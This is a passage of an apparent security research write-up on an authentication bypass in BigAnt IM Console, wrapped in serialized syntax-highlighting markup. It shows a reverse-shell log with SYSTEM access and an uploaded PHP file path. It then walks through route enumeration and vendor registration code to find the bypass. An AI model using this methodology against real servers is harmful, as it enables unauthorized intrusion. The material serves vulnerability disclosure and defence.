http:\u002F\u002F10.0.0.104:8000\u002Fdata\u002F387360F0-EECD-622B-5B90-C37F2BBD45B3\u002Fpan\u002F99C8911A-DCB3-E5F2-4298-1E3567AA0DAD\u002F2025-01-09\u002FJQsaYCKEOu.php",[1373,46248,19057],{"class":1387},[1373,46250,46251,46253,46255,46258,46260,46262,46264,46266,46268,46270,46273],{"class":1375,"line":6776},[1373,46252,38930],{"class":4640},[1373,46254,5417],{"class":1397},[1373,46256,46257],{"class":1391},"2025-01-09T14:50:22.821-07:00",[1373,46259,38938],{"class":4640},[1373,46261,5417],{"class":1397},[1373,46263,39062],{"class":1391},[1373,46265,38946],{"class":4640},[1373,46267,5417],{"class":1397},[1373,46269,183],{"class":1387},[1373,46271,46272],{"class":1391},"Caught new shell from 10.0.0.104:51690",[1373,46274,19057],{"class":1387},[1373,46276,46277,46279,46281,46283,46285,46287,46289,46291,46293,46295,46298],{"class":1375,"line":6781},[1373,46278,38930],{"class":4640},[1373,46280,5417],{"class":1397},[1373,46282,46257],{"class":1391},[1373,46284,38938],{"class":4640},[1373,46286,5417],{"class":1397},[1373,46288,38943],{"class":1391},[1373,46290,38946],{"class":4640},[1373,46292,5417],{"class":1397},[1373,46294,183],{"class":1387},[1373,46296,46297],{"class":1391},"Active shell from 10.0.0.104:51690",[1373,46299,19057],{"class":1387},[1373,46301,46302,46304,46307,46310],{"class":1375,"line":7524},[1373,46303,3129],{"class":2206},[1373,46305,46306],{"class":1391}," Windows",[1373,46308,46309],{"class":4640}," [Version ",[1373,46311,46312],{"class":1391},"10.0.17763.107]\n",[1373,46314,46315,46317,46319,46321,46324,46327,46330,46333,46336],{"class":1375,"line":7530},[1373,46316,1384],{"class":1383},[1373,46318,28578],{"class":2206},[1373,46320,2230],{"class":1383},[1373,46322,46323],{"class":2206}," 2018",[1373,46325,46326],{"class":1391}," Microsoft",[1373,46328,46329],{"class":1391}," Corporation.",[1373,46331,46332],{"class":1391}," All",[1373,46334,46335],{"class":1391}," rights",[1373,46337,46338],{"class":1391}," reserved.\n",[1373,46340,46341],{"class":1375,"line":7546},[1373,46342,6520],{"emptyLinePlaceholder":237},[1373,46344,46345,46348,46351,46354,46357,46360,46363,46366,46369,46372,46375,46378,46381,46384,46387,46390,46393,46396,46399,46402,46405,46408,46411],{"class":1375,"line":7571},[1373,46346,46347],{"class":2206},"C:\\Program",[1373,46349,46350],{"class":1391}," Files",[1373,46352,46353],{"class":4640}," (x86)",[1373,46355,46356],{"class":2326},"\\B",[1373,46358,46359],{"class":4640},"igAntSoft",[1373,46361,46362],{"class":2326},"\\I",[1373,46364,46365],{"class":4640},"M Console",[1373,46367,46368],{"class":2326},"\\i",[1373,46370,46371],{"class":4640},"m_webserver",[1373,46373,46374],{"class":2326},"\\h",[1373,46376,46377],{"class":4640},"tdocs",[1373,46379,46380],{"class":2326},"\\d",[1373,46382,46383],{"class":4640},"ata",[1373,46385,46386],{"class":2326},"\\3",[1373,46388,46389],{"class":4640},"87360F0-EECD-622B-5B90-C37F2BBD45B3",[1373,46391,46392],{"class":2326},"\\p",[1373,46394,46395],{"class":4640},"an",[1373,46397,46398],{"class":2326},"\\9",[1373,46400,46401],{"class":4640},"9C8911A-DCB3-E5F2-4298-1E3567AA0DAD",[1373,46403,46404],{"class":2326},"\\2",[1373,46406,46407],{"class":4640},"025-01-",[1373,46409,46410],{"class":1397},"09>",[1373,46412,35556],{"class":4640},[1373,46414,46415],{"class":1375,"line":7598},[1373,46416,35556],{"class":2206},[1373,46418,46419,46422,46425,46428],{"class":1375,"line":7615},[1373,46420,46421],{"class":2206},"nt",[1373,46423,46424],{"class":1391}," authority",[1373,46426,46427],{"class":2326},"\\s",[1373,46429,46430],{"class":1391},"ystem\n",[18,46432,46433],{},"While the shells are always great, the full path of discovery to exploitation can be just as valuable than the exploit.",[61,46435,46437],{"id":46436},"authentication-paths-saas-organizations","Authentication Paths & SaaS Organizations",[18,46439,46440],{},"After having the initial disappointing run in with a bad CVSS score assignment(PR is wrong so often), we decided to see if it was possible to quickly identify an authentication bypass vulnerability to amend the sins of the first CVSS score. The investigation combined static analysis with some simple fuzzing of paths to identify all unauthenticated endpoints before even diving too deep into application logic. The server utilizes the ThinkPHP framework, which is popular among Chinese vendors, and uses a model-view-controller design.",[18,46442,46443,46444,46447,46448,46451],{},"Investigation started with a quick enumeration of default exposed web pages later there were multiple views to landing pages that all appeared to be outside the standard ",[886,46445,46446],{},"\u002Findex.php\u002FHome\u002Flogin\u002Findex.html"," route. The most standout of the endpoints were multiple instances of account registration pages, which are a common vector for getting partial authentication or unexpected session settings, making it a prime target for an attacker. The one that showed the most \"red flags\" was the ",[886,46449,46450],{},"\u002Findex.php\u002FHome\u002FSaas\u002Freg_email.html\u002Findex.php\u002FHome\u002FSaas\u002Freg_email.html"," URI, which presented the following page:",[18,46453,46454],{},[68,46455],{"alt":46456,"src":46457,":width":10862},"BigAnt SaaS registration landing page","\u002Fblog\u002Fbigant-cve-2025-0364\u002Fbigant-1-saas-registration.png",[18,46459,46460],{},"These are the exact red flags we look for; auto-filled QQ addresses and user information, no documentation, a custom CAPTCHA, and a mention of organizational registration. Non-user initiated role creation is often a good place to look for authentication bypasses as machine, API, or group accounts often don't follow expected single user logic. Filling out the information and solving the CAPTCHA, we land on the following success message:",[18,46462,46463],{},[68,46464],{"alt":46465,"src":46466,":width":10862},"BigAnt successful SaaS registration message","\u002Fblog\u002Fbigant-cve-2025-0364\u002Fbigant-2-saas-registration.png",[18,46468,46469],{},"The server then sends an email, if configured with proper SMTP settings, with the SaaS registration information and an activation link containing a UUID. As an attacker, it's not good to burn any emails in our control and leaving breadcrumbs and we do not want to rely on the SMTP server having a complete configuration, so it was time to see if we could get the registration activation variables without configured SMTP or an email. It was time to dig in and see what's happening in these requests to see if there's anything we can use.",[18,46471,46472,46473,46476,46477,46480],{},"ThinkPHP allows you to embed functions inside of HTML forms and other backend content that corresponds to the HTML file field information. This means that functions inside the HTML files can be called to the corresponding controller functions. We can verify this by checking that the HTML file calls the ",[886,46474,46475],{},"reg_email_post"," function with the data provided in the ",[886,46478,46479],{},"Application\u002FHome\u002FView\u002FSaas\u002Freg_email.html"," page:",[1354,46482,46484],{"className":8228,"code":46483,"language":8230,"meta":219,"style":219},"\u003Cextend name=\"Public\u002Fbase\" \u002F>\n\n\n\u003Cblock name=\"main\">\n\n \u003Cform id=\"form\" action=\"{:U('reg_email_post')}\" method=\"post\">\n \u003Cdiv class=\"form-box\">\n \u003Cdiv class=\"form-header\">{:L('_SAAS_REGISTER_')}\u003C\u002Fdiv>\n \u003Cdiv class=\"form-body\">\n \u003Cdiv class=\"form\">\n \u003Cdiv class=\"form-group\">\n \u003Cinput type=\"text\" name=\"saas_showname\" id=\"saas_showname\" placeholder=\"{:L('_SHOWNAME_')}\" class=\"form-control required\" minlength=\"2\" maxlength=\"20\">\n \u003C\u002Fdiv>\n \u003Cdiv class=\"form-group\">\n \u003Cinput type=\"text\" name=\"saas_name\" id=\"saas_name\" placeholder=\"{:L('_SAASNAME_')}\" class=\"form-control required chrnum\">\n \u003C\u002Fdiv>\n \u003Cdiv class=\"form-group\">\n \u003Cinput type=\"text\" name=\"org_email\" id=\"org_email\" placeholder=\"{:L('_EMAIL_')}\" class=\"form-control required email\">\n \u003C\u002Fdiv>\n \u003Cdiv class=\"form-group\">\n \u003Cinput type=\"text\" name=\"saas_pwd\" id=\"saas_pwd\" placeholder=\"{:L('_PASSWORD_')}\" class=\"form-control required pwd\" minlength=\"6\" maxlength=\"20\">\n \u003C\u002Fdiv>\n\n",[886,46485,46486,46509,46513,46517,46536,46540,46582,46602,46632,46651,46670,46690,46775,46784,46802,46863,46871,46889,46950,46958,46976,47057],{"__ignoreMap":219},[1373,46487,46488,46490,46494,46497,46499,46501,46504,46506],{"class":1375,"line":1376},[1373,46489,11852],{"class":1383},[1373,46491,46493],{"class":46492},"snv6S","extend",[1373,46495,46496],{"class":8252}," name",[1373,46498,5417],{"class":1383},[1373,46500,183],{"class":1387},[1373,46502,46503],{"class":1391},"Public\u002Fbase",[1373,46505,183],{"class":1387},[1373,46507,46508],{"class":1383}," \u002F>\n",[1373,46510,46511],{"class":1375,"line":220},[1373,46512,6520],{"emptyLinePlaceholder":237},[1373,46514,46515],{"class":1375,"line":1266},[1373,46516,6520],{"emptyLinePlaceholder":237},[1373,46518,46519,46521,46523,46525,46527,46529,46532,46534],{"class":1375,"line":1852},[1373,46520,11852],{"class":1383},[1373,46522,10876],{"class":46492},[1373,46524,46496],{"class":8252},[1373,46526,5417],{"class":1383},[1373,46528,183],{"class":1387},[1373,46530,46531],{"class":1391},"main",[1373,46533,183],{"class":1387},[1373,46535,6765],{"class":1383},[1373,46537,46538],{"class":1375,"line":4692},[1373,46539,6520],{"emptyLinePlaceholder":237},[1373,46541,46542,46544,46546,46548,46550,46552,46554,46556,46559,46561,46563,46566,46568,46571,46573,46575,46578,46580],{"class":1375,"line":4724},[1373,46543,8246],{"class":1383},[1373,46545,21325],{"class":6300},[1373,46547,7911],{"class":8252},[1373,46549,5417],{"class":1383},[1373,46551,183],{"class":1387},[1373,46553,21325],{"class":1391},[1373,46555,183],{"class":1387},[1373,46557,46558],{"class":8252}," action",[1373,46560,5417],{"class":1383},[1373,46562,183],{"class":1387},[1373,46564,46565],{"class":1391},"{:U('reg_email_post')}",[1373,46567,183],{"class":1387},[1373,46569,46570],{"class":8252}," method",[1373,46572,5417],{"class":1383},[1373,46574,183],{"class":1387},[1373,46576,46577],{"class":1391},"post",[1373,46579,183],{"class":1387},[1373,46581,6765],{"class":1383},[1373,46583,46584,46586,46589,46591,46593,46595,46598,46600],{"class":1375,"line":4756},[1373,46585,8246],{"class":1383},[1373,46587,46588],{"class":6300},"div",[1373,46590,27205],{"class":8252},[1373,46592,5417],{"class":1383},[1373,46594,183],{"class":1387},[1373,46596,46597],{"class":1391},"form-box",[1373,46599,183],{"class":1387},[1373,46601,6765],{"class":1383},[1373,46603,46604,46607,46609,46611,46613,46615,46618,46620,46622,46625,46628,46630],{"class":1375,"line":4768},[1373,46605,46606],{"class":1383}," \u003C",[1373,46608,46588],{"class":6300},[1373,46610,27205],{"class":8252},[1373,46612,5417],{"class":1383},[1373,46614,183],{"class":1387},[1373,46616,46617],{"class":1391},"form-header",[1373,46619,183],{"class":1387},[1373,46621,5384],{"class":1383},[1373,46623,46624],{"class":4640},"{:L('_SAAS_REGISTER_')}",[1373,46626,46627],{"class":1383},"\u003C\u002F",[1373,46629,46588],{"class":6300},[1373,46631,6765],{"class":1383},[1373,46633,46634,46636,46638,46640,46642,46644,46647,46649],{"class":1375,"line":4792},[1373,46635,46606],{"class":1383},[1373,46637,46588],{"class":6300},[1373,46639,27205],{"class":8252},[1373,46641,5417],{"class":1383},[1373,46643,183],{"class":1387},[1373,46645,46646],{"class":1391},"form-body",[1373,46648,183],{"class":1387},[1373,46650,6765],{"class":1383},[1373,46652,46653,46656,46658,46660,46662,46664,46666,46668],{"class":1375,"line":4798},[1373,46654,46655],{"class":1383}," \u003C",[1373,46657,46588],{"class":6300},[1373,46659,27205],{"class":8252},[1373,46661,5417],{"class":1383},[1373,46663,183],{"class":1387},[1373,46665,21325],{"class":1391},[1373,46667,183],{"class":1387},[1373,46669,6765],{"class":1383},[1373,46671,46672,46675,46677,46679,46681,46683,46686,46688],{"class":1375,"line":4806},[1373,46673,46674],{"class":1383}," \u003C",[1373,46676,46588],{"class":6300},[1373,46678,27205],{"class":8252},[1373,46680,5417],{"class":1383},[1373,46682,183],{"class":1387},[1373,46684,46685],{"class":1391},"form-group",[1373,46687,183],{"class":1387},[1373,46689,6765],{"class":1383},[1373,46691,46692,46695,46697,46699,46701,46703,46705,46707,46709,46711,46713,46716,46718,46720,46722,46724,46726,46728,46731,46733,46735,46738,46740,46742,46744,46746,46749,46751,46754,46756,46758,46760,46762,46765,46767,46769,46771,46773],{"class":1375,"line":4817},[1373,46693,46694],{"class":1383}," \u003C",[1373,46696,15129],{"class":6300},[1373,46698,8253],{"class":8252},[1373,46700,5417],{"class":1383},[1373,46702,183],{"class":1387},[1373,46704,1359],{"class":1391},[1373,46706,183],{"class":1387},[1373,46708,46496],{"class":8252},[1373,46710,5417],{"class":1383},[1373,46712,183],{"class":1387},[1373,46714,46715],{"class":1391},"saas_showname",[1373,46717,183],{"class":1387},[1373,46719,7911],{"class":8252},[1373,46721,5417],{"class":1383},[1373,46723,183],{"class":1387},[1373,46725,46715],{"class":1391},[1373,46727,183],{"class":1387},[1373,46729,46730],{"class":8252}," placeholder",[1373,46732,5417],{"class":1383},[1373,46734,183],{"class":1387},[1373,46736,46737],{"class":1391},"{:L('_SHOWNAME_')}",[1373,46739,183],{"class":1387},[1373,46741,27205],{"class":8252},[1373,46743,5417],{"class":1383},[1373,46745,183],{"class":1387},[1373,46747,46748],{"class":1391},"form-control required",[1373,46750,183],{"class":1387},[1373,46752,46753],{"class":8252}," minlength",[1373,46755,5417],{"class":1383},[1373,46757,183],{"class":1387},[1373,46759,353],{"class":1391},[1373,46761,183],{"class":1387},[1373,46763,46764],{"class":8252}," maxlength",[1373,46766,5417],{"class":1383},[1373,46768,183],{"class":1387},[1373,46770,36929],{"class":1391},[1373,46772,183],{"class":1387},[1373,46774,6765],{"class":1383},[1373,46776,46777,46780,46782],{"class":1375,"line":4825},[1373,46778,46779],{"class":1383}," \u003C\u002F",[1373,46781,46588],{"class":6300},[1373,46783,6765],{"class":1383},[1373,46785,46786,46788,46790,46792,46794,46796,46798,46800],{"class":1375,"line":4835},[1373,46787,46674],{"class":1383},[1373,46789,46588],{"class":6300},[1373,46791,27205],{"class":8252},[1373,46793,5417],{"class":1383},[1373,46795,183],{"class":1387},[1373,46797,46685],{"class":1391},[1373,46799,183],{"class":1387},[1373,46801,6765],{"class":1383},[1373,46803,46804,46806,46808,46810,46812,46814,46816,46818,46820,46822,46824,46827,46829,46831,46833,46835,46837,46839,46841,46843,46845,46848,46850,46852,46854,46856,46859,46861],{"class":1375,"line":4843},[1373,46805,46694],{"class":1383},[1373,46807,15129],{"class":6300},[1373,46809,8253],{"class":8252},[1373,46811,5417],{"class":1383},[1373,46813,183],{"class":1387},[1373,46815,1359],{"class":1391},[1373,46817,183],{"class":1387},[1373,46819,46496],{"class":8252},[1373,46821,5417],{"class":1383},[1373,46823,183],{"class":1387},[1373,46825,46826],{"class":1391},"saas_name",[1373,46828,183],{"class":1387},[1373,46830,7911],{"class":8252},[1373,46832,5417],{"class":1383},[1373,46834,183],{"class":1387},[1373,46836,46826],{"class":1391},[1373,46838,183],{"class":1387},[1373,46840,46730],{"class":8252},[1373,46842,5417],{"class":1383},[1373,46844,183],{"class":1387},[1373,46846,46847],{"class":1391},"{:L('_SAASNAME_')}",[1373,46849,183],{"class":1387},[1373,46851,27205],{"class":8252},[1373,46853,5417],{"class":1383},[1373,46855,183],{"class":1387},[1373,46857,46858],{"class":1391},"form-control required chrnum",[1373,46860,183],{"class":1387},[1373,46862,6765],{"class":1383},[1373,46864,46865,46867,46869],{"class":1375,"line":4849},[1373,46866,46779],{"class":1383},[1373,46868,46588],{"class":6300},[1373,46870,6765],{"class":1383},[1373,46872,46873,46875,46877,46879,46881,46883,46885,46887],{"class":1375,"line":4877},[1373,46874,46674],{"class":1383},[1373,46876,46588],{"class":6300},[1373,46878,27205],{"class":8252},[1373,46880,5417],{"class":1383},[1373,46882,183],{"class":1387},[1373,46884,46685],{"class":1391},[1373,46886,183],{"class":1387},[1373,46888,6765],{"class":1383},[1373,46890,46891,46893,46895,46897,46899,46901,46903,46905,46907,46909,46911,46914,46916,46918,46920,46922,46924,46926,46928,46930,46932,46935,46937,46939,46941,46943,46946,46948],{"class":1375,"line":4915},[1373,46892,46694],{"class":1383},[1373,46894,15129],{"class":6300},[1373,46896,8253],{"class":8252},[1373,46898,5417],{"class":1383},[1373,46900,183],{"class":1387},[1373,46902,1359],{"class":1391},[1373,46904,183],{"class":1387},[1373,46906,46496],{"class":8252},[1373,46908,5417],{"class":1383},[1373,46910,183],{"class":1387},[1373,46912,46913],{"class":1391},"org_email",[1373,46915,183],{"class":1387},[1373,46917,7911],{"class":8252},[1373,46919,5417],{"class":1383},[1373,46921,183],{"class":1387},[1373,46923,46913],{"class":1391},[1373,46925,183],{"class":1387},[1373,46927,46730],{"class":8252},[1373,46929,5417],{"class":1383},[1373,46931,183],{"class":1387},[1373,46933,46934],{"class":1391},"{:L('_EMAIL_')}",[1373,46936,183],{"class":1387},[1373,46938,27205],{"class":8252},[1373,46940,5417],{"class":1383},[1373,46942,183],{"class":1387},[1373,46944,46945],{"class":1391},"form-control required email",[1373,46947,183],{"class":1387},[1373,46949,6765],{"class":1383},[1373,46951,46952,46954,46956],{"class":1375,"line":4931},[1373,46953,46779],{"class":1383},[1373,46955,46588],{"class":6300},[1373,46957,6765],{"class":1383},[1373,46959,46960,46962,46964,46966,46968,46970,46972,46974],{"class":1375,"line":4947},[1373,46961,46674],{"class":1383},[1373,46963,46588],{"class":6300},[1373,46965,27205],{"class":8252},[1373,46967,5417],{"class":1383},[1373,46969,183],{"class":1387},[1373,46971,46685],{"class":1391},[1373,46973,183],{"class":1387},[1373,46975,6765],{"class":1383},[1373,46977,46978,46980,46982,46984,46986,46988,46990,46992,46994,46996,46998,47001,47003,47005,47007,47009,47011,47013,47015,47017,47019,47022,47024,47026,47028,47030,47033,47035,47037,47039,47041,47043,47045,47047,47049,47051,47053,47055],{"class":1375,"line":4952},[1373,46979,46694],{"class":1383},[1373,46981,15129],{"class":6300},[1373,46983,8253],{"class":8252},[1373,46985,5417],{"class":1383},[1373,46987,183],{"class":1387},[1373,46989,1359],{"class":1391},[1373,46991,183],{"class":1387},[1373,46993,46496],{"class":8252},[1373,46995,5417],{"class":1383},[1373,46997,183],{"class":1387},[1373,46999,47000],{"class":1391},"saas_pwd",[1373,47002,183],{"class":1387},[1373,47004,7911],{"class":8252},[1373,47006,5417],{"class":1383},[1373,47008,183],{"class":1387},[1373,47010,47000],{"class":1391},[1373,47012,183],{"class":1387},[1373,47014,46730],{"class":8252},[1373,47016,5417],{"class":1383},[1373,47018,183],{"class":1387},[1373,47020,47021],{"class":1391},"{:L('_PASSWORD_')}",[1373,47023,183],{"class":1387},[1373,47025,27205],{"class":8252},[1373,47027,5417],{"class":1383},[1373,47029,183],{"class":1387},[1373,47031,47032],{"class":1391},"form-control required pwd",[1373,47034,183],{"class":1387},[1373,47036,46753],{"class":8252},[1373,47038,5417],{"class":1383},[1373,47040,183],{"class":1387},[1373,47042,356],{"class":1391},[1373,47044,183],{"class":1387},[1373,47046,46764],{"class":8252},[1373,47048,5417],{"class":1383},[1373,47050,183],{"class":1387},[1373,47052,36929],{"class":1391},[1373,47054,183],{"class":1387},[1373,47056,6765],{"class":1383},[1373,47058,47059,47061,47063],{"class":1375,"line":6776},[1373,47060,46779],{"class":1383},[1373,47062,46588],{"class":6300},[1373,47064,6765],{"class":1383},[18,47066,2245,47067,47069,47070,47073,47074,4606],{},[886,47068,46475],{}," function call is called inside of ",[886,47071,47072],{},"Application\u002FHome\u002FController\u002FSaasController.class.php:63",", which handles the sending of the email with the filled in data from the backend and user provided information. We want to follow the logic of where the UUID gets set and that appears in the following as the ",[886,47075,47076],{},"saas_id",[1354,47078,47080],{"className":1367,"code":47079,"language":1369,"meta":219,"style":219},"\u002F**\n * 邮箱saas\n * 1 新增SAAS\n * 2 发送邮件\n * 3 通过邮件地址激活SAAS\n *\u002F\nfunction reg_email_post(){\n\n \u002F*\n if(!$this->check_verify(I('verify'))){\n $this->error(L('_VALID_VERIFY_ERROR_'));exit;\n };\n *\u002F\n \n $res = $this->reg_saas(0);\n \n if($res['status']){\n $url = sp_get_host() . U('reg_activation',array('saas_id'=>$saasId)) ; \u002F\u002F生成激活的URL地址\n \u002F\u002F发送邮件\n $subject = L('_ACTIVATION_MAIL_SUBJECT_') ;\n $content = L('_ACTIVATION_MAIL_CONTENT_') ;\n $content = str_replace('[url]',$url,$content);\n $content = str_replace('[minute]',$M->activation_expire_miniute,$content);\n $res =sp_send_mail($data['org_email'], $subject, $content) ;\n if ($res){\n $url = U('reg_email_ok',array('saas_id'=>$saasId));\n $this->success(L('_ADD_SUCCESS_'), $url);\n }else{\n $this->error($res['err_msg']);\n }\n }else{\n $this->error($M->getError());\n }\n}\n",[886,47081,47082,47087,47092,47097,47102,47107,47112,47122,47126,47131,47136,47141,47145,47150,47155,47177,47182,47202,47259,47264,47290,47314,47344,47379,47419,47431,47471,47501,47510,47533,47537,47545,47565,47569],{"__ignoreMap":219},[1373,47083,47084],{"class":1375,"line":1376},[1373,47085,47086],{"class":4630},"\u002F**\n",[1373,47088,47089],{"class":1375,"line":220},[1373,47090,47091],{"class":4630}," * 邮箱saas\n",[1373,47093,47094],{"class":1375,"line":1266},[1373,47095,47096],{"class":4630}," * 1 新增SAAS\n",[1373,47098,47099],{"class":1375,"line":1852},[1373,47100,47101],{"class":4630}," * 2 发送邮件\n",[1373,47103,47104],{"class":1375,"line":4692},[1373,47105,47106],{"class":4630}," * 3 通过邮件地址激活SAAS\n",[1373,47108,47109],{"class":1375,"line":4724},[1373,47110,47111],{"class":4630}," *\u002F\n",[1373,47113,47114,47116,47119],{"class":1375,"line":4756},[1373,47115,8560],{"class":7293},[1373,47117,47118],{"class":7297}," reg_email_post",[1373,47120,47121],{"class":1383},"(){\n",[1373,47123,47124],{"class":1375,"line":4768},[1373,47125,6520],{"emptyLinePlaceholder":237},[1373,47127,47128],{"class":1375,"line":4792},[1373,47129,47130],{"class":4630}," \u002F*\n",[1373,47132,47133],{"class":1375,"line":4798},[1373,47134,47135],{"class":4630}," if(!$this->check_verify(I('verify'))){\n",[1373,47137,47138],{"class":1375,"line":4806},[1373,47139,47140],{"class":4630}," $this->error(L('_VALID_VERIFY_ERROR_'));exit;\n",[1373,47142,47143],{"class":1375,"line":4817},[1373,47144,18076],{"class":4630},[1373,47146,47147],{"class":1375,"line":4825},[1373,47148,47149],{"class":4630}," *\u002F\n",[1373,47151,47152],{"class":1375,"line":4835},[1373,47153,47154],{"class":4640}," \n",[1373,47156,47157,47159,47162,47164,47166,47168,47171,47173,47175],{"class":1375,"line":4843},[1373,47158,7362],{"class":1383},[1373,47160,47161],{"class":4640},"res ",[1373,47163,5417],{"class":1397},[1373,47165,35288],{"class":34505},[1373,47167,4667],{"class":1397},[1373,47169,47170],{"class":7297},"reg_saas",[1373,47172,1384],{"class":1383},[1373,47174,445],{"class":5467},[1373,47176,4680],{"class":1383},[1373,47178,47179],{"class":1375,"line":4849},[1373,47180,47181],{"class":4640}," \n",[1373,47183,47184,47186,47188,47191,47193,47195,47197,47199],{"class":1375,"line":4877},[1373,47185,4695],{"class":4636},[1373,47187,34467],{"class":1383},[1373,47189,47190],{"class":4640},"res",[1373,47192,7035],{"class":1383},[1373,47194,1388],{"class":1387},[1373,47196,9216],{"class":1391},[1373,47198,1388],{"class":1387},[1373,47200,47201],{"class":1383},"]){\n",[1373,47203,47204,47206,47209,47211,47214,47216,47218,47221,47223,47225,47228,47230,47232,47235,47237,47239,47241,47243,47246,47248,47251,47253,47256],{"class":1375,"line":4915},[1373,47205,4727],{"class":1383},[1373,47207,47208],{"class":4640},"url ",[1373,47210,5417],{"class":1397},[1373,47212,47213],{"class":7297}," sp_get_host",[1373,47215,7514],{"class":1383},[1373,47217,1398],{"class":1397},[1373,47219,47220],{"class":7297}," U",[1373,47222,1384],{"class":1383},[1373,47224,1388],{"class":1387},[1373,47226,47227],{"class":1391},"reg_activation",[1373,47229,1388],{"class":1387},[1373,47231,5437],{"class":1383},[1373,47233,47234],{"class":1379},"array",[1373,47236,1384],{"class":1383},[1373,47238,1388],{"class":1387},[1373,47240,47076],{"class":1391},[1373,47242,1388],{"class":1387},[1373,47244,47245],{"class":1397},"=>",[1373,47247,4644],{"class":1383},[1373,47249,47250],{"class":4640},"saasId",[1373,47252,27548],{"class":1383},[1373,47254,47255],{"class":1383}," ;",[1373,47257,47258],{"class":4630}," \u002F\u002F生成激活的URL地址\n",[1373,47260,47261],{"class":1375,"line":4931},[1373,47262,47263],{"class":4630}," \u002F\u002F发送邮件\n",[1373,47265,47266,47268,47271,47273,47276,47278,47280,47283,47285,47287],{"class":1375,"line":4947},[1373,47267,4727],{"class":1383},[1373,47269,47270],{"class":4640},"subject ",[1373,47272,5417],{"class":1397},[1373,47274,47275],{"class":7297}," L",[1373,47277,1384],{"class":1383},[1373,47279,1388],{"class":1387},[1373,47281,47282],{"class":1391},"_ACTIVATION_MAIL_SUBJECT_",[1373,47284,1388],{"class":1387},[1373,47286,2230],{"class":1383},[1373,47288,47289],{"class":1383}," ;\n",[1373,47291,47292,47294,47297,47299,47301,47303,47305,47308,47310,47312],{"class":1375,"line":4952},[1373,47293,4727],{"class":1383},[1373,47295,47296],{"class":4640},"content ",[1373,47298,5417],{"class":1397},[1373,47300,47275],{"class":7297},[1373,47302,1384],{"class":1383},[1373,47304,1388],{"class":1387},[1373,47306,47307],{"class":1391},"_ACTIVATION_MAIL_CONTENT_",[1373,47309,1388],{"class":1387},[1373,47311,2230],{"class":1383},[1373,47313,47289],{"class":1383},[1373,47315,47316,47318,47320,47322,47324,47326,47328,47331,47333,47336,47338,47340,47342],{"class":1375,"line":6776},[1373,47317,4727],{"class":1383},[1373,47319,47296],{"class":4640},[1373,47321,5417],{"class":1397},[1373,47323,34816],{"class":1379},[1373,47325,1384],{"class":1383},[1373,47327,1388],{"class":1387},[1373,47329,47330],{"class":1391},"[url]",[1373,47332,1388],{"class":1387},[1373,47334,47335],{"class":1383},",$",[1373,47337,7585],{"class":4640},[1373,47339,47335],{"class":1383},[1373,47341,13389],{"class":4640},[1373,47343,4680],{"class":1383},[1373,47345,47346,47348,47350,47352,47354,47356,47358,47361,47363,47365,47368,47370,47373,47375,47377],{"class":1375,"line":6781},[1373,47347,4727],{"class":1383},[1373,47349,47296],{"class":4640},[1373,47351,5417],{"class":1397},[1373,47353,34816],{"class":1379},[1373,47355,1384],{"class":1383},[1373,47357,1388],{"class":1387},[1373,47359,47360],{"class":1391},"[minute]",[1373,47362,1388],{"class":1387},[1373,47364,47335],{"class":1383},[1373,47366,47367],{"class":4640},"M",[1373,47369,4667],{"class":1397},[1373,47371,47372],{"class":4640},"activation_expire_miniute",[1373,47374,47335],{"class":1383},[1373,47376,13389],{"class":4640},[1373,47378,4680],{"class":1383},[1373,47380,47381,47383,47385,47387,47390,47392,47394,47396,47398,47400,47402,47404,47406,47409,47411,47413,47415,47417],{"class":1375,"line":7524},[1373,47382,4727],{"class":1383},[1373,47384,47161],{"class":4640},[1373,47386,5417],{"class":1397},[1373,47388,47389],{"class":7297},"sp_send_mail",[1373,47391,34467],{"class":1383},[1373,47393,9156],{"class":4640},[1373,47395,7035],{"class":1383},[1373,47397,1388],{"class":1387},[1373,47399,46913],{"class":1391},[1373,47401,1388],{"class":1387},[1373,47403,27625],{"class":1383},[1373,47405,4656],{"class":1383},[1373,47407,47408],{"class":4640},"subject",[1373,47410,5437],{"class":1383},[1373,47412,4656],{"class":1383},[1373,47414,13389],{"class":4640},[1373,47416,2230],{"class":1383},[1373,47418,47289],{"class":1383},[1373,47420,47421,47423,47426,47428],{"class":1375,"line":7530},[1373,47422,9773],{"class":4636},[1373,47424,47425],{"class":1383}," ($",[1373,47427,47190],{"class":4640},[1373,47429,47430],{"class":1383},"){\n",[1373,47432,47433,47436,47438,47440,47442,47444,47446,47449,47451,47453,47455,47457,47459,47461,47463,47465,47467,47469],{"class":1375,"line":7546},[1373,47434,47435],{"class":1383}," $",[1373,47437,47208],{"class":4640},[1373,47439,5417],{"class":1397},[1373,47441,47220],{"class":7297},[1373,47443,1384],{"class":1383},[1373,47445,1388],{"class":1387},[1373,47447,47448],{"class":1391},"reg_email_ok",[1373,47450,1388],{"class":1387},[1373,47452,5437],{"class":1383},[1373,47454,47234],{"class":1379},[1373,47456,1384],{"class":1383},[1373,47458,1388],{"class":1387},[1373,47460,47076],{"class":1391},[1373,47462,1388],{"class":1387},[1373,47464,47245],{"class":1397},[1373,47466,4644],{"class":1383},[1373,47468,47250],{"class":4640},[1373,47470,1413],{"class":1383},[1373,47472,47473,47476,47478,47480,47482,47484,47486,47488,47491,47493,47495,47497,47499],{"class":1375,"line":7571},[1373,47474,47475],{"class":34505}," $this",[1373,47477,4667],{"class":1397},[1373,47479,16142],{"class":7297},[1373,47481,1384],{"class":1383},[1373,47483,13918],{"class":7297},[1373,47485,1384],{"class":1383},[1373,47487,1388],{"class":1387},[1373,47489,47490],{"class":1391},"_ADD_SUCCESS_",[1373,47492,1388],{"class":1387},[1373,47494,15534],{"class":1383},[1373,47496,4656],{"class":1383},[1373,47498,7585],{"class":4640},[1373,47500,4680],{"class":1383},[1373,47502,47503,47506,47508],{"class":1375,"line":7598},[1373,47504,47505],{"class":1383}," 